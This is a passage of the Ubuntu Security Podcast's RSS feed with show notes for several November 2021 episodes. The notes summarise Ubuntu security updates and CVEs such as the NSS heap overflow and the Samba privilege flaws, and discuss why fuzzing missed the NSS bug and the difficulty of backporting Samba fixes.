<h3 id="usn-5168-1-usn-5168-2-usn-5168-3-nss-and-thunderbird-vulnerability-06-08">[<a href="https://ubuntu.com/security/notices/USN-5168-1">USN-5168-1</a>, <a href="https://ubuntu.com/security/notices/USN-5168-2">USN-5168-2</a>, <a href="https://ubuntu.com/security/notices/USN-5168-3">USN-5168-3</a>] NSS and Thunderbird vulnerability [06:08]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43527">CVE-2021-43527</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="new-nss-vulnerability--cve-2021-43527--discussion-06-17">New NSS vulnerability (<a href="https://ubuntu.com/security/CVE-2021-43527">CVE-2021-43527</a>) discussion [06:17]</h2>
<ul>
<li>Discovered by Tavis Ormandy at GPZ</li>
<li>NSS is a very old project, code in question has existed since 2003 and
been exploitable since at least 2012 when it was refactored</li>
<li>Does a direct memcpy of an attacker controlled amount of data into a
fixed size buffer without specifically checking whether the data is too
large - classic heap-based buffer overflow</li>
<li>Object on the heap also contains function pointer which then get called
so relatively easy to get control flow and code execution as a result</li>
<li>NSS was one of the first projects added to oss-fuzz (Google), Mozilla do
own fuzzing as well, extensive testsuite and uses ASAN for internal
builds</li>
<li>Uses <a href="https://scan.coverity.com/projects/nss">Coverity</a> but this didn&rsquo;t detect it either</li>
<li>Existing fuzzing and unit tests had test cases which could reach this
code but failed to find it for a number of reasons:
<ul>
<li>Fuzz input is limited to 10k - but to overflow need at least 16,384
bytes so fuzzing couldn&rsquo;t have caught this</li>
<li>Individual code paths fuzzed but not so much end-to-end systematic
testing - so nothing which would try generating say large inputs in
this case - does occur for other code-paths though</li>
<li>Existing metrics almalgate results from all fuzzers - so hard to tell
how well a piece of code has been fuzzed as it may have been using a
fuzzed which may never trigger relevant input to find bugs like this</li>
</ul>
</li>
<li>Seemingly well tested, well fuzzed code is not enough - need to look
systematically and quantify how complete the coverage is not just in
terms of LOC or inputs used, but also boundary conditions etc</li>
<li><a href="https://googleprojectzero.blogspot.com/2021/12/this-shouldnt-have-happened.html">https://googleprojectzero.blogspot.com/2021/12/this-shouldnt-have-happened.html</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E140.mp3" length="9584653" type="audio/mpeg" /><itunes:duration>12:39</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 139
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-139/</link>
          <pubDate>Fri, 26 Nov 2021 15:19:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>ca90d0671dad9395b79082838517120c0f2e6bf8b9bbb3074db98bb73096e39c5042a7ffcd7b0985a4bc89fc7a7e6b1efb44456e004945fd7be502360c7d13fc</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 139</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we put out a call for testing and feedback on proposed Samba
  updates for Ubuntu 18.04 LTS plus we look at security updates for Mailman,
  Thunderbird, LibreOffice, BlueZ and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we put out a call for testing and feedback on proposed Samba
  updates for Ubuntu 18.04 LTS plus we look at security updates for Mailman,
  Thunderbird, LibreOffice, BlueZ and more.
  </itunes:summary>
        <description>  This week we put out a call for testing and feedback on proposed Samba
  updates for Ubuntu 18.04 LTS plus we look at security updates for Mailman,
  Thunderbird, LibreOffice, BlueZ and more.
  </description>
        <googleplay:description>  This week we put out a call for testing and feedback on proposed Samba
  updates for Ubuntu 18.04 LTS plus we look at security updates for Mailman,
  Thunderbird, LibreOffice, BlueZ and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we put out a call for testing and feedback on proposed Samba
updates for Ubuntu 18.04 LTS plus we look at security updates for Mailman,
Thunderbird, LibreOffice, BlueZ and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>15 unique CVEs addressed</p>
<h3 id="usn-5150-1-openexr-vulnerability-00-39">[<a href="https://ubuntu.com/security/notices/USN-5150-1">USN-5150-1</a>] OpenEXR vulnerability [00:39]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3941">CVE-2021-3941</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>oss-fuzz -&gt; div-by-zero with crafted image using YUV-encoded colors</li>
</ul>
<h3 id="usn-5151-1-mailman-vulnerabilities-00-58">[<a href="https://ubuntu.com/security/notices/USN-5151-1">USN-5151-1</a>] Mailman vulnerabilities [00:58]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43332">CVE-2021-43332</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43331">CVE-2021-43331</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Similar to vulns in last Mailman update (<a href="https://ubuntusecuritypodcast.org/episode-136/">Episode 136</a>)</li>
</ul>
<h3 id="usn-5152-1-thunderbird-vulnerabilities-01-27">[<a href="https://ubuntu.com/security/notices/USN-5152-1">USN-5152-1</a>] Thunderbird vulnerabilities [01:27]</h3>
<ul>
<li>5 CVEs addressed in Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38509">CVE-2021-38509</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38507">CVE-2021-38507</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38506">CVE-2021-38506</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38504">CVE-2021-38504</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38503">CVE-2021-38503</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>91.3.1</li>
<li>Usual web framework issues (HTML email etc) - one TB specific issue
around the ability to force TB into full-screen via web content
navigation - could then spoof usual chrome which is hidden in fullscreen
and get user input unexpectedly</li>
</ul>
<h3 id="usn-5153-1-libreoffice-vulnerabilities-02-23">[<a href="https://ubuntu.com/security/notices/USN-5153-1">USN-5153-1</a>] LibreOffice vulnerabilities [02:23]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-25634">CVE-2021-25634</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25633">CVE-2021-25633</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 issues around interpretation / display of details for signed
documents - could inject a new timestamp and get this shown as the time
the document was signed, or could cause to show incorrect details for a
signed document by adding details from another certificate</li>
<li>Too invasive to backport for 18.04 LTS</li>
</ul>
<h3 id="usn-5154-1-freerdp-vulnerabilities-03-28">[<a href="https://ubuntu.com/security/notices/USN-5154-1">USN-5154-1</a>] FreeRDP vulnerabilities [03:28]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-41160">CVE-2021-41160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41159">CVE-2021-41159</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB write in client if sent malicious data from server -&gt; crash / code-exec</li>
<li>if using a gateway and the RPC protocol, would fail to validate input -&gt;
malicious gateway could then corrupt client memory -&gt; crash / code-exec</li>
</ul>
<h3 id="usn-5155-1-bluez-vulnerabilities-04-07">[<a href="https://ubuntu.com/security/notices/USN-5155-1">USN-5155-1</a>] BlueZ vulnerabilities [04:07]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43400">CVE-2021-43400</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41229">CVE-2021-41229</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3658">CVE-2021-3658</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Would save and restore discoverable status on power down / power up - so
if powered down when discoverable would power up as discoverable</li>
<li>UAF if gatt client disconnected during a particular write operation with
dbus - so would likely need bad luck or cooperation between a local
application / user and the device to trigger</li>
<li>Memory leak in handling of SDP devices -&gt; DoS</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="samba-updates-available-for-testing-for-ubuntu-18-dot-04-lts-05-24">Samba updates available for testing for Ubuntu 18.04 LTS [05:24]</h3>
<ul>
<li><a href="https://discourse.ubuntu.com/t/samba-update-for-ubuntu-18-04-lts-bionic/25408">https://discourse.ubuntu.com/t/samba-update-for-ubuntu-18-04-lts-bionic/25408</a></li>
<li><a href="https://ubuntusecuritypodcast.org/episode-138/">Episode 138</a> discussed difficulties in handling large security updates for
ageing software</li>
<li>Backport ~700 patches (with potential regressions) or backport newer
version, possibly breaking things in the process due to new features /
changes in behaviour etc (plus incompatibilities with other software in
Ubuntu archive)</li>
<li>Upstream released</li>
<li>Contains fixes for the most severe CVEs from the most recent updates for
Samba (<a href="https://ubuntu.com/security/notices/USN-5142-1">USN-5142-1</a>) - <a href="https://ubuntu.com/security/CVE-2016-2124">CVE-2016-2124</a>, <a href="https://ubuntu.com/security/CVE-2020-25717">CVE-2020-25717</a>, <a href="https://ubuntu.com/security/CVE-2020-25722">CVE-2020-25722</a>,
<a href="https://ubuntu.com/security/CVE-2021-3671">CVE-2021-3671</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E139.mp3" length="5930294" type="audio/mpeg" /><itunes:duration>7:49</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 138
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-138/</link>
          <pubDate>Fri, 19 Nov 2021 14:21:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>7bbf4ff223c9dd9f124a917ecd3c8b18d78346dd5833d27792ecb6b57754e21cf51a5deb01bdd0820074eaf0ffb81debeed05e46c47cbc28d791414e8a561bcd</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 138</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we discuss some of the challenges and trade-offs encountered when
  providing security support for ageing software, plus we discuss security
  updates for the Linux kernel, Firejail, Samba, PostgreSQL and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we discuss some of the challenges and trade-offs encountered when
  providing security support for ageing software, plus we discuss security
  updates for the Linux kernel, Firejail, Samba, PostgreSQL and more.
  </itunes:summary>
        <description>  This week we discuss some of the challenges and trade-offs encountered when
  providing security support for ageing software, plus we discuss security
  updates for the Linux kernel, Firejail, Samba, PostgreSQL and more.
  </description>
        <googleplay:description>  This week we discuss some of the challenges and trade-offs encountered when
  providing security support for ageing software, plus we discuss security
  updates for the Linux kernel, Firejail, Samba, PostgreSQL and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we discuss some of the challenges and trade-offs encountered when
providing security support for ageing software, plus we discuss security
updates for the Linux kernel, Firejail, Samba, PostgreSQL and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>42 unique CVEs addressed</p>
<h3 id="usn-5138-1-python-py-vulnerability-00-38">[<a href="https://ubuntu.com/security/notices/USN-5138-1">USN-5138-1</a>] python-py vulnerability [00:38]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-29651">CVE-2020-29651</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Python library providing path handling, config file parsing and other
features which are now in standard lib or other packages - has been
deprecated</li>
<li>ReDoS against path handling code (regex with catastrophic backtracking)</li>
</ul>
<h3 id="usn-5139-1-linux-kernel--oem-5-dot-10--vulnerabilities-01-25">[<a href="https://ubuntu.com/security/notices/USN-5139-1">USN-5139-1</a>] Linux kernel (OEM 5.10) vulnerabilities [01:25]</h3>
<ul>
<li>7 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43389">CVE-2021-43389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43056">CVE-2021-43056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41864">CVE-2021-41864</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3760">CVE-2021-3760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3764">CVE-2021-3764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3744">CVE-2021-3744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3655">CVE-2021-3655</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Power8 specific KVM issue -&gt; guest can crash host -&gt; DoS</li>
<li>AMD cryptographic coprocessor driver memory leaks -&gt; DoS</li>
<li>eBPF integer overflow -&gt; DoS / code-exec</li>
<li>NFC UAF</li>
<li>SCTP info leak</li>
</ul>
<h3 id="usn-5140-1-linux-kernel--oem-5-dot-14--vulnerabilities-02-12">[<a href="https://ubuntu.com/security/notices/USN-5140-1">USN-5140-1</a>] Linux kernel (OEM 5.14) vulnerabilities [02:12]</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-41864">CVE-2021-41864</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3764">CVE-2021-3764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3744">CVE-2021-3744</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>eBPF integer overflow -&gt; DoS / code-exec</li>
<li>AMD cryptographic coprocessor driver memory leaks -&gt; DoS</li>
</ul>
<h3 id="usn-5137-2-linux-kernel-vulnerabilities-02-33">[<a href="https://ubuntu.com/security/notices/USN-5137-2">USN-5137-2</a>] Linux kernel vulnerabilities [02:33]</h3>
<ul>
<li>9 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3759">CVE-2021-3759</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3753">CVE-2021-3753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3743">CVE-2021-3743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3739">CVE-2021-3739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35477">CVE-2021-35477</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34556">CVE-2021-34556</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3428">CVE-2021-3428</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36385">CVE-2020-36385</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19449">CVE-2019-19449</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 (focal bluefield / oracle, bionic oracle / gke)</li>
</ul>
<h3 id="lsn-0082-1-linux-kernel-vulnerability-03-05">[<a href="https://ubuntu.com/security/notices/LSN-0082-1">LSN-0082-1</a>] Linux kernel vulnerability [03:05]</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3715">CVE-2021-3715</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3444">CVE-2021-3444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29661">CVE-2020-29661</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29660">CVE-2020-29660</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 high priority vulns from GPZ (<a href="https://ubuntusecuritypodcast.org/episode-138/">Episode 138</a>) in tty subsystem and 1 in
BPF verifier - code-exec -&gt; privesc</li>
<li>UAF in IPv4 networking routing handling</li>
</ul>
<h3 id="usn-5141-1-firejail-vulnerability-03-48">[<a href="https://ubuntu.com/security/notices/USN-5141-1">USN-5141-1</a>] Firejail vulnerability [03:48]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-26910">CVE-2021-26910</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>TOCTOU race condition in handling of overlayfs - decided to drop support
for overlayfs since was deemed - thanks to Reiner Herrmann for providing
this update</li>
</ul>
<h3 id="usn-5142-1-samba-vulnerabilities-04-43">[<a href="https://ubuntu.com/security/notices/USN-5142-1">USN-5142-1</a>] Samba vulnerabilities [04:43]</h3>
<ul>
<li>9 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3671">CVE-2021-3671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3738">CVE-2021-3738</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23192">CVE-2021-23192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25722">CVE-2020-25722</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25721">CVE-2020-25721</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25719">CVE-2020-25719</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25718">CVE-2020-25718</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25717">CVE-2020-25717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-2124">CVE-2016-2124</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Raft of issues including unauthenticated users able to become root on
domain members since Samba might incorrectly map local users to domain
members, plus incorrect handling of Kerberos tickets such that delegated
users could become domain admin by confusing Samba on which user a ticket
represented</li>
<li>Memory corruption issues too</li>
<li>In particular the fix to correctly map local to domain users results in
changed behaviour regarding matching AD users to local users - would
previously fallback to a local user but now does not to avoid someone
specifying DOMAIN/root and then having that fallback to say root on the
local machine</li>
<li><a href="https://www.samba.org/samba/security/CVE-2020-25717.html">https://www.samba.org/samba/security/CVE-2020-25717.html</a></li>
</ul>
<h3 id="usn-5144-1-openexr-vulnerability-05-55">[<a href="https://ubuntu.com/security/notices/USN-5144-1">USN-5144-1</a>] OpenEXR vulnerability [05:55]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3933">CVE-2021-3933</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow -&gt; buffer overflow -&gt; crash / RCE</li>
</ul>
<h3 id="usn-5145-1-postgresql-vulnerabilities-06-08">[<a href="https://ubuntu.com/security/notices/USN-5145-1">USN-5145-1</a>] PostgreSQL vulnerabilities [06:08]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-23222">CVE-2021-23222</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23214">CVE-2021-23214</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Incorrect handling of SSL cert verification - could allow a remote
attacker to inject arbitrary SQL queries on the initial connection
establishment (similar to various STARTTLS vulns which have been seen
recently) - would process data sent in the clear before the TLS
connection had been established but should just throw this away</li>
<li>New upstream release with other bug fixes too (13.5 - impish/hirsute,
12.9 - focal, 10.19 - bionic)</li>
</ul>
<h3 id="usn-5147-1-vim-vulnerabilities-07-13">[<a href="https://ubuntu.com/security/notices/USN-5147-1">USN-5147-1</a>] Vim vulnerabilities [07:13]</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3928">CVE-2021-3928</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3927">CVE-2021-3927</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3903">CVE-2021-3903</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3872">CVE-2021-3872</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20807">CVE-2019-20807</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17087">CVE-2017-17087</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Swap file permissions handling, restricted mode bypass (shouldn&rsquo;t be
considered a real security mechanism), various memory corruption issues
too</li>
</ul>
<h3 id="usn-5149-1-accountsservice-vulnerability-08-01">[<a href="https://ubuntu.com/security/notices/USN-5149-1">USN-5149-1</a>] AccountsService vulnerability [08:01]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3939">CVE-2021-3939</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Double free in SetLanguage() DBus method - memory corruption in root
daemon which can be triggered by an unprivileged user - is due to a
Ubuntu specific patch which we include so that when the user selects a
language / format we save this in their <code>~/.pam_environment</code> to keep
settings in sync</li>
<li>Patch contained code to use an existing pointer but then freed it - and
then it would get freed again by the original code</li>
<li>Priv-esc by getting accountsservice daemon to run arbitrary code</li>
</ul>
<h3 id="usn-5148-1-hivex-vulnerability-09-24">[<a href="https://ubuntu.com/security/notices/USN-5148-1">USN-5148-1</a>] hivex vulnerability [09:24]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3504">CVE-2021-3504</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Tools for handling Windows Registry hive files</li>
<li>OOB read with specially crafted input file -&gt; crash -&gt; DoS</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="how-to-handle-large-security-updates-in-outdated-software-versions-09-56">How to handle large security updates in outdated software versions? [09:56]</h3>
<ul>
<li>Samba updates in [<a href="https://ubuntu.com/security/notices/USN-5142-1">USN-5142-1</a>] do not include Bionic</li>
<li>Upstream released a new 4.13.14 which we could upgrade to in F/H/I/J
without a lot of work or risk of regression since those releases already
used a more recent version like 4.11 etc so the change in behaviour as a
result of upgrading was so large and other packages in the archive were
still compatible with this new version</li>
<li>Upstream has released patches for these vulns back to 4.10 but this is
686 individual patches - bionic has Samba 4.7 and so would require a lot
of manual work to backport these ~700 patches, and the risk of
introducing a regression (ie breaking something) when backporting such a
large set of changes is higher
<ul>
<li>We are security engineers not full-time Samba software developers so
not cognisant of all the possible pitfalls etc</li>
</ul>
</li>
<li>Other option would be to update Samba in bionic to 4.13.14 like in the
later releases, other packages like talloc, tdb, tevent and ldb and these
would all need to be upgraded as well</li>
<li><strong>But</strong> this new Samba version only supports python3, not python2.7 which the
older Samba currently in bionic does</li>
<li>FreeIPA in bionic is Python2 so would then be broken if we did this upgrade</li>
<li>We could also try and upgrade FreeIPA to a newer version which uses
Python3 but it isn&rsquo;t clear if the required Python3 dependencies even
exist in the 18.04 archive - so they man need to be backported and
introduced there as well</li>
<li>Either option involves a lot of change and hence complexity ∴ a high risk
of regression</li>
<li>Unclear yet which will be the preferred option but this illustrates the
difficulties involved in doing security support for old software versions
which upstream has ceased to provide support</li>
<li>Will likely come across more cases like this as we get further into ESM
support periods for various packages - Bionic is still in it&rsquo;s LTS phase
till 2023 so not even in ESM and already has trouble for Samba</li>
<li>Watch this space&hellip;</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E138.mp3" length="12122338" type="audio/mpeg" /><itunes:duration>15:56</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 137
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-137/</link>
          <pubDate>Fri, 12 Nov 2021 14:48:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>5d7f1408e458caa81870392ec5cff31f60da85ef26888a03f9e5601edb3bc7655e67e075bf64451c3990ff69123da31be75254488e9e209e85bbadf698da5990</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 137</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at some details of the 29 unique CVEs addressed across
  the supported Ubuntu releases in the past 7 days and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at some details of the 29 unique CVEs addressed across
  the supported Ubuntu releases in the past 7 days and more.
  </itunes:summary>
        <description>  This week we look at some details of the 29 unique CVEs addressed across
  the supported Ubuntu releases in the past 7 days and more.
  </description>
        <googleplay:description>  This week we look at some details of the 29 unique CVEs addressed across
  the supported Ubuntu releases in the past 7 days and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at some details of the 29 unique CVEs addressed across
the supported Ubuntu releases in the past 7 days and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>29 unique CVEs addressed</p>
<h3 id="usn-5131-1-firefox-vulnerabilities-00-42">[<a href="https://ubuntu.com/security/notices/USN-5131-1">USN-5131-1</a>] Firefox vulnerabilities [00:42]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38509">CVE-2021-38509</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38508">CVE-2021-38508</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38507">CVE-2021-38507</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38506">CVE-2021-38506</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38504">CVE-2021-38504</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38503">CVE-2021-38503</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>94.0
<ul>
<li>Copy image link - copies final image URL after redirects - if a page
